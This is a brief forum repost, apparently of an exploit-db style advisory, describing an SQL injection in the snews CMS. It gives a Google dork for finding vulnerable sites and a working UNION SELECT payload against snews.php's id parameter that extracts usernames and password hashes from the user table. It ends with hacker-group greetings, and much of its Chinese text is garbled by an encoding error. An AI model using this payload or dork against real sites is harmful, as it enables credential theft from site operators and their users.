admin 2013-1-23 08:55:06

CMS snews SQLע估޸

: CMS snews SQL Injection Vulnerability
: By onestree
صַ : http://snewscms.com/
ƽ̨ : ubuntu 12.10 / win 7
ؼ: inurl:"tanyakan pada rumput yang bergoyang"


*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=

ʾ

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


л:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
   
          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*
ҳ: [1]
鿴汾: CMS snews SQLע估޸